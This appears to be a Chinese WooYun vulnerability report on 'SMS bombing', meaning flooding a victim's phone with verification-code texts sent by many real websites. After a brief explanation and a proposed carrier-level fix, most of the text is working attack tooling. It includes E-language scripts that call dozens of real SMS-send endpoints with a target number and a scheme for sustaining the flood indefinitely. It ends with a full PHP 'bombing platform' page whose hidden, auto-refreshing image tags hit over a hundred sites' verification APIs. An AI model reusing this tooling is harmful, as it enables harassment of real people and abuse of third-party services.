简要描述:
随着移动端与PC的渐渐融合,也为了保证用户的可靠性,流量的质量,越来越多的网站实行了一个策略,那就是将手 机验证码发至用户的手机上。在Wooyun常常可以看到这些东西的绕过,以及这些东西的滥用——短信DOS,给用户造成极大的不便,厂商也对此积极修补 (也许是因为中国移动是按条数收费吧)但这个是否是最可怕的呢,不,最可怕的不是DOS,是DDOS,这种东西,不是厂商所能控制的。
详细说明:
先上两张图
好了你们懂我意思了,没错,就是用各个网站的验证码,来同时发给一个手机,那样既是网站所认可的,网站所允许的,对于单个网站的发送也是有过之而无不及。
而更加揪心的是对此毫无反抗的方法,传统的垃圾短信等阻断器都是利用数据库或者是敏感字眼进行过滤,而为了保证用户的体验验证码类的是不会拦截的。http://zone.wooyun.org/content/4912这种情况我们可以手动添加10086作为拦截目标,但是如果是用上千个网站上千个号码进行攻击呢?手动添加肯定是来不及的。更况且不断的短信占用极大系统资源弹窗执行其他操作是很困难的。而关机或者飞行模式只能换取短暂的安宁,因为短信未能发送到手机会暂时停留,待手机能正常通信之后依旧发送到手机。而全部拦截的软件应该是没有,就算有也只有极个别应用商店才会有。
这种情况,也就是说,假如攻击者一直这样攻击,被攻击者是很难有招架之力的。上几个月“呼死你”有威胁他人的情况,我相信这个方法的危害堪比“呼死你”
漏洞证明:
下面讲讲如何制作
首先,我们找到一个有手机注册功能的网站。
这里我用NC抓包,然后发送短信验证码
发现moblie=XXXXXXXXXXX
这个XXXXX就是你在网站输入的手机号
然后这里我们就搜集了一条,继续去其他网站搜集,注意这里有些是post,有些是get
搜集完了之后,我这里用易语言,支持国产语言。。
.版本 2 .支持库 internet HTTP读文件 (“http://” + 删首尾空 (编辑框1.内容) + “.12530.com/user/querypwd.do?phonenumber=” + 删首尾空 (编辑框1.内容)) HTTP读文件 (“http://” + 删首尾空 (编辑框1.内容) + “.12530.com/user/querypwd.do?phonenumber=” + 删首尾空 (编辑框1.内容)) HTTP读文件 (“http://” + 删首尾空 (编辑框1.内容) + “.12530.com/user/querypwd.do?phonenumber=” + 删首尾空 (编辑框1.内容)) HTTP读文件 (“http://china.alibaba.com/member/sendIdentityCodeByMobile.htm?callback=jQuery1640829300928232310891_1326548812739&mobile=” + 删首尾空 (编辑框1.内容)) HTTP读文件 (“http://china.alibaba.com/member/sendIdentityCodeByMobile.htm?callback=jQuery1640829300932302133891_1326548812739&mobile=” + 删首尾空 (编辑框1.内容)) HTTP读文件 (“http://china.alibaba.com/member/sendIdentityCodeByMobile.htm?callback=jQuery1640829300923212323891_1326548812739&mobile=” + 删首尾空 (编辑框1.内容)) HTTP读文件 (“http://www.egu365.com/member/js/sendMobileCode.jsp?phone=” + 删首尾空 (编辑框1.内容) + “&r=1019.7334977874661”) HTTP读文件 (“http://china.alibaba.com/member/sendIdentityCodeByMobile.htm?callback=jQuery1640829300942433110891_1326548812739&mobile=” + 删首尾空 (编辑框1.内容)) HTTP读文件 (“http://www.dbank.com/app/wap/captcha.php?mobile=” + 删首尾空 (编辑框1.内容)) HTTP读文件 (“http://china.alibaba.com/member/sendIdentityCodeByMobile.htm?callback=jQuery1640829300942424110891_1326548812739&mobile=” + 删首尾空 (编辑框1.内容)) HTTP读文件 (“http://china.alibaba.com/member/sendIdentityCodeByMobile.htm?callback=jQuery1640829300923223110891_1326548812739&mobile=” + 删首尾空 (编辑框1.内容)) HTTP读文件 (“register.sdo.com/gaea/SendPhoneMsg.ashx?page=REG&mobile=” + 删首尾空 (编辑框1.内容)) HTTP读文件 (“register.sdo.com/gaea/SendPhoneMsg.ashx?page=REG&mobile=” + 删首尾空 (编辑框1.内容)) HTTP读文件 (“http://my.b2b.hc360.com/my/turbine/action/company.RegisterAjaxAction/eventsubmit_dosendverifiycodesms/doSendverifiycodesms?receiver=” + 删首尾空 (编辑框1.内容)) HTTP读文件 (“http://china.alibaba.com/member/sendIdentityCodeByMobile.htm?callback=jQuery164082930042421210891_1326548812739&mobile=” + 删首尾空 (编辑框1.内容)) HTTP读文件 (“http://china.alibaba.com/member/sendIdentityCodeByMobile.htm?callback=jQuery164082930424249110891_1326548812739&mobile=” + 删首尾空 (编辑框1.内容)) HTTP读文件 (“http://www.egu365.com/member/js/sendMobileCode.jsp?phone=” + 删首尾空 (编辑框1.内容) + “&r=1019.7334977874661”) HTTP读文件 (“http://china.alibaba.com/member/sendIdentityCodeByMobile.htm?callback=jQuery164082930042449110891_1326548812739&mobile=” + 删首尾空 (编辑框1.内容)) HTTP读文件 (“http://my.b2b.hc360.com/my/turbine/action/company.RegisterAjaxAction/eventsubmit_dosendverifiycodesms/doSendverifiycodesms?receiver=” + 删首尾空 (编辑框1.内容)) HTTP读文件 (“http://china.alibaba.com/member/sendIdentityCodeByMobile.htm?callback=jQuery16408293023239110891_1326548812739&mobile=” + 删首尾空 (编辑框1.内容)) HTTP读文件 (“http://passport.soufun.com/ajax/ajaxmobilecode_v3.aspx?mobile=” + 删首尾空 (编辑框1.内容)) HTTP读文件 (“http://user.himovie.net/AjaxPro/Ajax.ashx?action=RegSendCode&phone=” + 删首尾空 (编辑框1.内容)) HTTP读文件 (“http://user.himovie.net/AjaxPro/Ajax.ashx?action=RegSendCode&phone=” + 删首尾空 (编辑框1.内容)) HTTP读文件 (“http://user.himovie.net/AjaxPro/Ajax.ashx?action=RegSendCode&phone=” + 删首尾空 (编辑框1.内容)) HTTP读文件 (“http://www.egu365.com/member/js/sendMobileCode.jsp?phone=” + 删首尾空 (编辑框1.内容) + “&r=1019.7334977874661”) HTTP读文件 (“http://wap.mail.163.com/reg.s?regtype=mobile&method=registerMobile&mobile_num=” + 删首尾空 (编辑框1.内容) + “&password=asdasd&password2=asdasd&action=提交注册信息”) HTTP读文件 (“http://www.egu365.com/member/js/sendMobileCode.jsp?phone=” + 删首尾空 (编辑框1.内容) + “&r=1019.7334977874661”)
这里的编辑框1.内容就是手机号了,这里放出部分地址供大家参考。
然后是post的
.版本 2 .局部变量 POST地址, 文本型 .局部变量 POST数据, 文本型 .局部变量 a, 文本型 .局部变量 b, 文本型 .局部变量 c, 文本型 .局部变量 d, 文本型 .局部变量 e, 文本型 .局部变量 f, 文本型 POST地址 = “http://www.istudy.com.cn/incpage/AxMember.html” POST数据 = “Mode=4&Mobile=” + 删首尾空 (编辑框1.内容) + “&UserID=0&rnd=0.232398880064155” + 到文本 (取随机数 (11, 99)) a = “http://passport.kongzhong.com/safebyphone.do?sbp=tobindsafephone” b = “idcard=3704811993070638” + 到文本 (取随机数 (11, 99)) + “&safephone=” + 删首尾空 (编辑框1.内容) c = “http://mp3.easou.com/dg.e?l=2ld.1&esid=nq-aHZcGWms&wver=c” d = “phone=” + 删首尾空 (编辑框1.内容) + “&name=&content=&song=%E8%A2%AB%E7%88%B1%E5%87%BA%E5%8D%96%E8%A2%AB%E6%83%85%E6%89%93%E8%B4%A5-%E6%9E%97%E5%86%B2&esid=nq-aHZcGWms&id=6985089&submit=%E9%80%9A%E8%BF%87%E7%9F%AD%E4%BF%A1%E5%85%8D%E8%B4%B9%E7%82%B9%E6%92%AD” e = “phone=” + 删首尾空 (编辑框1.内容) + “&name=&content=&song=%E6%9D%A8%E4%B8%9E%E7%90%B3-%E9%9B%A8%E7%88%B1-%E5%8D%8E%E4%BA%BA%E7%BE%A4%E6%98%9F19&esid=nq-aHZcGWms&id=3867344&submit=%E9%80%9A%E8%BF%87%E7%9F%AD%E4%BF%A1%E5%85%8D%E8%B4%B9%E7%82%B9%E6%92%AD” f = “phone=” + 删首尾空 (编辑框1.内容) + “&name=&content=&song=%E7%88%B1%E7%9A%84%E4%BE%9B%E5%85%BB-%E6%9D%A8%E5%B9%82&esid=nq-aHZcGWms&id=3889055&submit=%E9%80%9A%E8%BF%87%E7%9F%AD%E4%BF%A1%E5%85%8D%E8%B4%B9%E7%82%B9%E6%92%AD” 彗星HTTP读文件 (a, “POST”, , , b) 彗星HTTP读文件 (a, “POST”, , , b) 彗星HTTP读文件 (a, “POST”, , , b) 彗星HTTP读文件 (a, “POST”, , , b)
最大的伤害我觉得是这样的,由几家存在发送漏洞的网站(即可无限发送)不断的提交,然后其他的网站分为几组,每组发送完之后做延迟处理,然后其他网站一轮下来之后之前的组所给的限制时间已经到了,那就继续发送,这样永不停歇。
当然也有网站是通过电话播报验证码的,一个方法。。
.版本 2 .局部变量 a, 文本型 .局部变量 b, 文本型 a = “http://www.m3.cc/url.php?class=check” b = “action=validphone&MemberMobile=” + 删首尾空 (编辑框3.内容) 彗星HTTP读文件 (a, “POST”, , , b)
修复方案:
这个修补办法的话,我觉得可以让CNVD联系中国移动、联通,做一个统一的短信接口,让同一个号码,在比如规定60秒之内,只能使用一次接口,多余的全部作废。
也许做起来需要大量的精力和财力。但是真的随着互联网的发展速度,这是不得不考虑的一个问题。
以后补会越加麻烦。千里之堤毁于蚁穴,更何况,这不是个蚁穴。
贡献一个短信轰炸平台
网址:http://v2excom.duapp.com/
代码
<?php
$tel_no = $_GET['hm'];
$c = $_GET['c']?$_GET['c']:0;
$c++;
?>
<!DOCTYPE html>
<html>
<head>
<title>迷你轰炸台 - 短信炸弹 - BETA!</title>
<?php
if($tel_no){
echo "<meta http-equiv=refresh content='5; url=index.php?hm={$tel_no}&c={$c}'>";
}
?>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="http://frontend.oss.aliyuncs.com/bootstrap/2.3.1/css/bootstrap.min.css" rel="stylesheet" media="screen">
<style>
body {margin: 5px;}
</style>
</head>
<body>
<div class="panel panel-success" style="margin-bottom: 0px;">
<div class="panel-heading">
<h3 class="panel-title">迷你轰炸台</h3>
</div>
<form method='GET' action='index.php'>
<div class="input-group">
<span class="input-group-addon input-lg">+86</span>
<input type="text" name='hm' maxlength='11' class="form-control input-lg" placeholder="输入需要轰炸的号码" value="" />
<button type="submit" class="btn btn-danger" name="ok" onclick="ajaxRequest(0);">启动轰炸线程</button>
</div>
</form>
<?php
if($tel_no){
?>
<br />
<div id='ajax_thread_msg'>
<div class='alert alert-success' style='margin-bottom: 0px;'>
轰炸 <strong><?php echo $tel_no;?></strong> , 第 <strong><?php echo $c;?></strong> 波攻击 , 已轰炸 <strong>N</strong> 次(不信请测试自己的手机号).
</div>
</div>
<div style='display:none'>
<img src='http://member.1688.com//member/ajax/send_identity_code_by_mobile.do?callback=jQuery172007067019236274064_1376100939244&mobile=<?php echo $tel_no;?>&area=86&isBizMobile=true' alt=''/>
<img src='https://affiliate-program.amazon.com/gp/associates/apply/assoc-ivs.html?phoneNumber=%2B86<?php echo $tel_no;?>&operation=start&ts=1376044348191' alt=''/>
<img src='http://authleqr.sdo.com/lars/send-login-validate-code.jsaonp?callback=jQuery16206594030656120524_1341237419373&userId=<?php echo $tel_no;?>' alt=''/>
<img src='http://member.tiancity.com/handler/GetPhoneRegAuthCodeHandler.ashx?a=135&userid=<?php echo $tel_no;?>' alt=''/>
<img src='https://affiliate-program.amazon.com/gp/associates/apply/assoc-ivs.html?phoneNumber=%2B86<?php echo $tel_no;?>&operation=start&ts=1376099658512' alt=''/>
<img src='http://i.360.cn/smsApi/sendsmscode?account=<?php echo $tel_no;?>&condition=2&r=0.8326570473673853&callback=QiUserJsonP1354551431282' alt=''/>
<img src='https://affiliate-program.amazon.com/gp/associates/apply/assoc-ivs.html?phoneNumber=%2B86<?php echo $tel_no;?>&operation=start&ts=137606625123' alt=''/>
<img src='http://passport.cnyw.net//ajax.php?action=getverify&mobile=<?php echo $tel_no;?>' alt=''/>
<img src='http://www.kunlun.com/?act=ajax.registGetMobileCode&mobile=<?php echo $tel_no;?>&type=regist' alt=''/>
<img src='http://www.vko.cn/sendmobile.html?phone=<?php echo $tel_no;?>&{}&_=1355879411734' alt=''/>
<img src='http://www.66call.com/register.aspx?__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKLTYzNzEwOTYxOA9kFgJmD2QWDAIFDw8WAh4EVGV4dAULMTU5NTAxMjgwMzZkZAIHDw8WBh8ABQblj6%2FnlKgeCENzc0NsYXNzBQ5yX2NfY19yX2NoZWNrMR4EXyFTQgICZGQCDQ8PZBYCHgV2YWx1ZQUJamlhbmdsaWxpZAIPDw8WBh8ABQbpgJrov4cfAQUOcl9jX2Nfcl9jaGVjazEfAgICZGQCEQ8PZBYCHwMFCWppYW5nbGlsaWQCEw8PFgYfAAUG6YCa6L%2BHHwEFDnJfY19jX3JfY2hlY2sxHwICAmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uMoC6NmiwUtO9MaSDo%2BblDqWjloj5&txtact=<?php echo $tel_no;?>&hidfoc=&hidisOk=1&txtpwd=jianglili&txtrepwd=jianglili&txtcode=&ImageButton1.x=59&ImageButton1.y=11' alt=''/>
<img src='https://affiliate-program.amazon.com/gp/associates/apply/assoc-ivs.html?phoneNumber=%2B86<?php echo $tel_no;?>&operation=start&ts=<?php echo $tel_no;?>' alt=''/>
<img src='http://register.sdo.com/gaea/SendPhoneMsg.ashx?page=REG&mobile=<?php echo $tel_no;?>' alt=''/>
<img src='http://wap.easou.com/sms.e?name=%e8%93%9d%e8%93%9d%e5%a4%a9%e7%a9%ba&mobile=<?php echo $tel_no;?>&action=sms&usid=9&' alt=''/>
<img src='http://www.gewara.com/ajax/mobile/register.xhtml?mobile=<?php echo $tel_no;?>&captchaId=&captcha=' alt=''/>
<img src='http://w.sohu.com/t2/tologin.do?mnd=<?php echo $tel_no;?>&qr=1' alt=''/>
<img src='http://www.66call.com/register.aspx?__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKLTYzNzEwOTYxOA9kFgJmD2QWDAIFDw8WAh4EVGV4dAULMTU5NTAxMjgwMzZkZAIHDw8WBh8ABQblj6%2FnlKgeCENzc0NsYXNzBQ5yX2NfY19yX2NoZWNrMR4EXyFTQgICZGQCDQ8PZBYCHgV2YWx1ZQUJamlhbmdsaWxpZAIPDw8WBh8ABQbpgJrov4cfAQUOcl9jX2Nfcl9jaGVjazEfAgICZGQCEQ8PZBYCHwMFCWppYW5nbGlsaWQCEw8PFgYfAAUG6YCa6L%2BHHwEFDnJfY19jX3JfY2hlY2sxHwICAmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uMoC6NmiwUtO9MaSDo%2BblDqWjloj5&txtact=<?php echo $tel_no;?>&hidfoc=&hidisOk=1&txtpwd=zhasini&txtrepwd=zhasini&txtcode=&ImageButton1.x=59&ImageButton1.y=11' alt=''/>
<img src='http://wap.dm.10086.cn/X/o/3455101/447117/mva0?a=/enduser/querySMSValiCodeByWap20.action&templateDir=template&theme=simple&name=querySMSValiCode&id=querySMSValiCode&downId=&operateType=1&isPass=true&user.accountName=<?php echo $tel_no;?>&Submit=%E4%B8%8B%E4%B8%80%E6%AD%A5' alt=''/>
<img src='http://a.10086.cn/pams2/s/s.do?c=204&j=l&lpt=1&mobile=<?php echo $tel_no;?>&p=72' alt=''/>
<img src='http://read.10086.cn/www/firstpage/getValidateCode.action?phone=<?php echo $tel_no;?>&sf=0' alt=''/>
<img src='http://read.10086.cn/www/NiceNameAjax?msisdn=<?php echo $tel_no;?>&e_cm=cmmobile' alt=''/>
<img src='https://cmpay.10086.cn/service/send_chk_no.xhtml?REG_MBL_NO=<?php echo $tel_no;?>&SMS_CD=URM001&typ=Y&r=0.9636801626045905' alt=''/>
<img src='https://feixin.10086.cn/account/RegisterLv3Ajax?stype=m&stext=<?php echo $tel_no;?>' alt=''/>
<img src='http://my.feixin.10086.cn/password/findpasswordvalidate?type=0&account=<?php echo $tel_no;?>' alt=''/>
<img src='http://218.206.191.106/idm/usermgr/usernameCheck?mobilePhone=<?php echo $tel_no;?>' alt=''/>
<img src='http://go.10086.cn/index.do?method=doReg&mobile=<?php echo $tel_no;?>&source=reg' alt=''/>
<img src='http://www.keepc.com/registerForMobileForCode.act?mobileNo=<?php echo $tel_no;?>' alt=''/>
<img src='http://wap.cmread.com/sso/oauth2/msisdnRegister?e_l=1&f=7718&pg=221&msisdn=<?php echo $tel_no;?>&passwd=1415926' alt=''/>
<img src='https://passport.jd.com/emReg/isMobileEngaged?mobile=<?php echo $tel_no;?>&r=0.08241349037594953' alt=''/>
<img src='http://shoujibao.net/pams2/m/s.do?j=l&c=31879&p=73&mobile=<?php echo $tel_no;?>&password=1415926' alt=''/>
<img src='http://club.service.autohome.com.cn/Ashx/CreateMobileCode.ashx?mobile=<?php echo $tel_no;?>' alt=''/>
<img src='http://www.huggieshappyclub.com/Handler/Vcode.ashx?mobile=<?php echo $tel_no;?>' alt=''/>
<img src='http://wap.buidq.com/wap/webcallService.aspx?tel=<?php echo $tel_no;?>' alt=''/>
<img src='http://www.uwewe.com/get/IsUser.aspx?phone=<?php echo $tel_no;?>&quhao=86' alt=''/>
<img src='http://www.uwewe.com/get/SendMessage.aspx?phone=<?php echo $tel_no;?>&ccode=86&type=1' alt=''/>
<img src='http://www.66call.com/forgetpwd.aspx?ScriptManager1=UpdatePanel1|ImageButton2&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTExMjY2ODE5MTgPFgYeCFRpbWVTcGFuBqpmMwD38M%2BIHgRjb2RlBQQ0MjY1HgRhY2N0BQsxNTgzODgwMjA0MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFDEltYWdlQnV0dG9uMgUMSW1hZ2VCdXR0b24xBQxJbWFnZUJ1dHRvbjPdI0AXCiz2XIYks0CPZpmkSSEMDg%3D%3D&txtacct=<?php echo $tel_no;?>&txtcode=7426&txtpwd=&txtrepwd=&ImageButton2.x=76&ImageButton2.y=18' alt=''/>
<img src='http://www.wcall.net/ajax/send_captcha.jsp?mobile=86<?php echo $tel_no;?>' alt=''/>
<img src='http://www.uwewe.com/wap/reg.aspx?__VIEWSTATE=%2FwEPDwUKLTg3MDQ4MjcyNGRkTWAEkK5GOtWg8l1At7LuQLJsrtk%3D&__EVENTVALIDATION=%2FwEWBwLf79jTDQL7h7XWDwKd%2B7q4BwLinreAAgLChPzDDQK7q7GGCAKM54rGBiIS9Dt7i1j1h%2BDtH9EcyHIWJVZf&txtacct=<?php echo $tel_no;?>&txtpwd=&txtRepwd=&txtCode=&Button2=%E8%AF%AD%E9%9F%B3%E8%8E%B7%E5%8F%96%E9%AA%8C%E8%AF%81%E7%A0%81' alt=''/><img src='http://www.gewara.com/ajax/mobile/register.xhtml?mobile=<?php echo $tel_no;?>&captchaId=&captcha=' alt=''/>
<img src='http://www.gewara.com/checkMember.xhtml?tag=mobile&itemvalue=<?php echo $tel_no;?>' alt=''/>
<img src='http://www.dianping.com/ajax/json/account/reg/mobile/send?m=<?php echo $tel_no;?>' alt=''/>
<img src='http://www.ushi.com/openRegU!checkNumber.jhtml?basicProfile.mobile=<?php echo $tel_no;?>' alt=''/>
<img src='http://www.efala.net/newfindpwbysms.flow?byname=<?php echo $tel_no;?>' alt=''/>
<img src='http://zj.189.cn/zjpr/member/authentication/sendValidatePhone.html?phone=<?php echo $tel_no;?>' alt=''/>
<img src='http://weibo.com/signup/v5/formcheck?type=mobile&value=<?php echo $tel_no;?>&__rnd=1363496469546' alt=''/>
<img src='http://api.open.uc.cn/cas/register/mobi/resendVCode?uc_param_str=einisivelafrpf&client_id=20033&from=cas&mobi=<?php echo $tel_no;?>' alt=''/>
<img src='http://ptlogin.4399.com/ptlogin/sendRegPhoneCode.do?phone=<?php echo $tel_no;?>&appId=www_home&v=1&v=1' alt=''/>
<img src='http://i.youku.com/u/bindMobile?__rt=1&__ro=&mobile=<?php echo $tel_no;?>' alt=''/>
<img src='https://safe.renren.com/actions/changesafemobile/sendmobilecaptcha?ajax-type=json&token=1ZhR7iv65SgaNXliuA7mujgTO3s3k1CL&mobile=<?php echo $tel_no;?>&requestToken=496404876&_rtk=e95787e6' alt=''/>
<img src='http://club.service.autohome.com.cn/Ashx/CreateMobileCode.ashx?mobile=<?php echo $tel_no;?>' alt=''/>
<img src='http://service.zol.com.cn/user/ajax/sendMsgCode.php?phone=<?php echo $tel_no;?>' alt=''/>
<img src='https://login.vancl.com/login/BeginRegister.ashx?action=sendmobilecode&key=<?php echo $tel_no;?>&validatecode=&_=1363498730859' alt=''/>
<img src='http://passport.eastmoney.com/chkphone.aspx?flag=check¶m=<?php echo $tel_no;?>' alt=''/>
<img src='http://passport.eastmoney.com/chkphone.aspx?flag=resend¶m=<?php echo $tel_no;?>' alt=''/>
<img src='http://passport.cntv.cn/mobileRegister.do?msisdn=<?php echo $tel_no;?>&verfiCodeType=1&method=getRequestVerifiCode' alt=''/>
<img src='http://register.zhenai.com/register/validateMobile.jsps?mobile=<?php echo $tel_no;?>' alt=''/>
<img src='http://reg.jiayuan.com/libs/xajax/reguser.server.php?processSendOrUpdateMessage&xajax=processSendOrUpdateMessage&xajaxargs%5B%5D=%3Cxjxquery%3E%3Cq%3Emobile%3Dd$%3C%2Fq%3E%3C%2Fxjxquery%3E&xajaxargs%5B%5D=mobile&xajaxr=1363500615734' alt=''/>
<img src='https://passport.jd.com/emReg/sendMobileCode?mobile=<?php echo $tel_no;?>&r=0.9010949897739119' alt=''/>
<img src='https://member.suning.com/emall/SNCellPhoneRegisterCmd?actionType=reSendValCode&logonId=<?php echo $tel_no;?>&URL=SNUserRegisterComfirmView&_=1363500974671' alt=''/>
<img src='http://account.iqiyi.com/security/secret/mobile/adm.action?time=1363501090218&mobile=<?php echo $tel_no;?>' alt=''/>
<img src='http://www.skywldh.com/registerForMobileForCode.act?mobileNo=<?php echo $tel_no;?>&smSecurityCode=' alt=''/>
<img src='http://wap.skywldh.com/index.php?register&flag=flag&phone=<?php echo $tel_no;?>&mss=on' alt=''/>
<img src='http://zg51.net/web/customer/forgetPwd_up.asp?customermobile=<?php echo $tel_no;?>&verify=01f735f97f1af959&checkcodeflag=1' alt=''/>
<img src='http://www.qqvoice.com/free/getExpCode.do?_isAjaxRequest=true&phonemail=<?php echo $tel_no;?>&type=1&randvalue=' alt=''/>
<img src='http://www.feiin.com/findAccountInfoByAccount.act?mobile=<?php echo $tel_no;?>' alt=''/>
<img src='http://wap.feiin.cn/index.php?register?phone=<?php echo $tel_no;?>' alt=''/>
<img src='http://www.feiin.cn/bindMobileCode.act?account=<?php echo $tel_no;?>&quhao=0086' alt=''/>
<img src='http://www.139talk.com/user/regnum.html?phone=<?php echo $tel_no;?>&type=1&key=ofoedsv0oeg6aari1m3ig0nsc5' alt=''/>
<img src='http://www.139talk.com/invite/invitesms.html?phone=<?php echo $tel_no;?>&key=ofoedsv0oeg6aari1m3ig0nsc5' alt=''/>
<img src='http://www.139talk.com/invite/regnum.html?phone=<?php echo $tel_no;?>&type=1&key=ofoedsv0oeg6aari1m3ig0nsc5' alt=''/>
<img src='http://www.139talk.com/invite/register.html?p=cGhvbmV8MTU4Mzg4MDIwNDJ8Y2hrY29kZXw4OTczfGRhdGV8MjAxMy0wMy0xNw==' alt=''/>
<img src='http://www.139talk.com/download/smsdownload.html?popPhone=<?php echo $tel_no;?>&phoneType=Iphone&popKey=ofoedsv0oeg6aari1m3ig0nsc5' alt=''/>
<img src='http://www.159talk.com/user/regnum.html?phone=<?php echo $tel_no;?>&type=1&key=h5u9albk8oveqm17rfo6kvo226' alt=''/>
<img src='http://my.tv.sohu.com/user/reg/getmstatus.do?passport=<?php echo $tel_no;?>' alt=''/>
<img src='http://sso.letv.com/user/mobileRegCode/mobile/<?php echo $tel_no;?>/mobilecodeletvid/k961601363512388' alt=''/>
<img src='http://register.sdo.com/gaea/SendPhoneMsg.ashx?page=REG&mobile=<?php echo $tel_no;?>' alt=''/>
<img src='http://download.feixin.10086.cn/download/downloadFLToMobile.action?id=50&no=<?php echo $tel_no;?>&isCheckCode=1' alt=''/>
<img src='http://my.feixin.10086.cn/password/sendfindpasswordsms?MobileNo=<?php echo $tel_no;?>' alt=''/>
<img src='http://f.10086.cn/im5/register/checkMobile.action?mobileNo=<?php echo $tel_no;?>' alt=''/>
<img src='http://zc.qq.com/cgi-bin/bd/send_sms?acc=<?php echo $tel_no;?>&bkn=1656136920&v=0.6187287989762199' alt=''/>
<img src='http://weibo.com/signup/v5/formcheck?type=sendsms&value=<?php echo $tel_no;?>&__rnd=1364610012046http://hm.baidu.com/hm.gif?cc=1&ck=1&cl=16-bit&ds=1280x800&ep=%E8%8E%B7%E5%8F%96%E9%AA%8C%E8%AF%81%E7%A0%81*%E7%82%B9%E5%87%BB&et=4&fl=11.6&ja=1&ln=zh-cn&lo=0&nv=1&rnd=2125197633&si=4cd143d67831005438c65f586314c582&st=3&su=http://club.autohome.com.cn%2Fbbs%2Fthread-c-148-2031217-1.html&v=1.0.40&lv=1&api=8_0&tt=%E7%94%A8%E6%88%B7%E6%B3%A8%E5%86%8C_%E6%B1%BD%E8%BD%A6%E4%B9%8B%E5%AE%B6' alt=''/>
<img src='https://www.qianwang365.com/uc/ajax/obtainSecurityCode4Regist.html?username=<?php echo $tel_no;?>' alt=''/>
<img src='http://www.efala.net/getcode.flow?phone=<?php echo $tel_no;?>&cardno=&code=&' alt=''/>
<img src='http://passport.wanmei.com/NoteAction.do?method=sendRegCode&mobile=<?php echo $tel_no;?>' alt=''/>
<img src='http://biz.b2b.cn/member/SendCode.ashx?temptime=1365067755281&m=<?php echo $tel_no;?>' alt=''/>
<img src='http://www.kunlun.com/index.php?act=ajax.checkUsername&user_name=<?php echo $tel_no;?>' alt=''/>
<img src='http://reg.email.163.com/unireg/call.do?cmd=added.mobileverify.sendAcode&mobile=<?php echo $tel_no;?>&uid=<?php echo $tel_no;?>%40163.com&mark=mobile_start' alt=''/>
<img src='http://passport.eastmoney.com/chkphone.aspx?flag=resend¶m=<?php echo $tel_no;?>' alt=''/>
<img src='http://user.syyx.com/ajax/users/checkusername.aspx?u=<?php echo $tel_no;?>&r=0.42031912299903756' alt=''/>
<img src='http://www.keepc.com/findAccountInfoByAccount.act?mobile=<?php echo $tel_no;?>' alt=''/>
<img src='http://service.zol.com.cn/user/ajax/sendMsgCode.php?phone=<?php echo $tel_no;?>' alt=''/>
<img src='http://gwpassport2.woniu.com/v2/checkusername?jsoncallback=jQuery172013263149083391296_1365068016801&username=<?php echo $tel_no;?>&_=1365068030671' alt=''/>
<img src='http://passport.upaidui.com/mobiles/send_validation_code?mobile_number=<?php echo $tel_no;?>' alt=''/>
<img src='http://user.51wan.com/reg_index_check_0.html?type=username&is=mobile&username=<?php echo $tel_no;?>' alt=''/>
<img src='http://interface.game.renren.com/ActivityCenter/?catalog=plugins&gameid=all&aname=reg&method=reg.subUserInfo&mobile=<?php echo $tel_no;?>&callback=jQuery17204292543791520399_1365068164751&_=1365068180406' alt=''/>
<img src='http://my.xoyo.com/register/NewIsExist/?uid=<?php echo $tel_no;?>' alt=''/>
<img src='http://member.tiancity.com/handler/GetPhoneRegAuthCodeHandler.ashx?a=0.016777698590329404&userid=<?php echo $tel_no;?>' alt=''/>
<img src='http://member.changyou.com/register/checkPhoneIsUsed.do?securityPhone=<?php echo $tel_no;?>' alt=''/>
<img src='http://www.game5.com/member/sendRegisterVerifyCode?reg_mobile=<?php echo $tel_no;?>' alt=''/>
<img src='http://passport.kongzhong.com/acc.do?m=sendPhoneVcodeFast&callback=jQuery17200752385214847075_1364445730228&phone=<?php echo $tel_no;?>&smsvcode=%E8%BE%93%E5%85%A5%E6%89%8B%E6%9C%BA%E8%8E%B7%E5%8F%96%E7%9A%84%E9%AA%8C%E8%AF%81%E7%A0%81&_=1364445764320' alt=''/>
<img src='http://www.pceggs.com/myaccount/mobile_ajax.aspx?refresh=0&i_mobileNo=<?php echo $tel_no;?>' alt=''/>
<img src='http://www.9dapai.com/SMSAuthentication/SMSAuthenticationPage.aspx/btnGenerateCheckCode_Click?(Content)=%7Bcellnum%3A'<?php echo $tel_no;?>'%7D' alt=''/>
<img src='http://www.veryzhun.com/ajax/register.asp?mobile=<?php echo $tel_no;?>&areacode=86' alt=''/>
<img src='http://wap.callda.com/register_2.jsp?phoneNumber=<?php echo $tel_no;?>' alt=''/>
<img src='http://www.200call.com/index.php?action=vphone?uphone=<?php echo $tel_no;?>' alt=''/>
<img src='http://wap.12580call.cn/index.php?register&phone=<?php echo $tel_no;?>' alt=''/>
<img src='http://w.yunpan.360.cn/intf.php?method=Sms.issue&qid=177256015&devtype=box&v=1.9.2.1245&devid=5b5b55bfc9f1f3113963b1f1350adc65&devname=&rtick=6969759&sign=aa8d029e8036f3f9d555956388dc4c57&ofmt=xml&pid=home&mobile=<?php echo $tel_no;?>&contype=mdu&token=3708649921.6.95535003.177256015.1366401362' alt=''/>
<img src='http://member.tiancity.com/handler/GetPhoneRegAuthCodeHandler.ashx?a=0.6334787302703851&userid=<?php echo $tel_no;?>' alt=''/>
<img src='http://passport.eastmoney.com/chkphone.aspx?flag=resend¶m=<?php echo $tel_no;?>' alt=''/>
<img src='http://passport.17u.cn/Member/RegisterHandler.ashx?action=phone&phone=<?php echo $tel_no;?>&iid=0.6011805873638694' alt=''/>
<img src='http://3g.163.com/t/signup.do?mobile=<?php echo $tel_no;?>&sub=%E8%8E%B7%E5%8F%96%E5%AF%86%E7%A0%81%E7%9F%AD%E4%BF%' alt=''/>
<img src='http://m.mail.163.com/reg.s?regtype=mobile&method=registerMobile&mobile_num=<?php echo $tel_no;?>&password=testtest&password2=testtest&action=%E6%8F%90%E4%BA%A4%E6%B3%A8%E5%86%8C%E4%BF%A1%E6%81%AF=400' alt=''/>
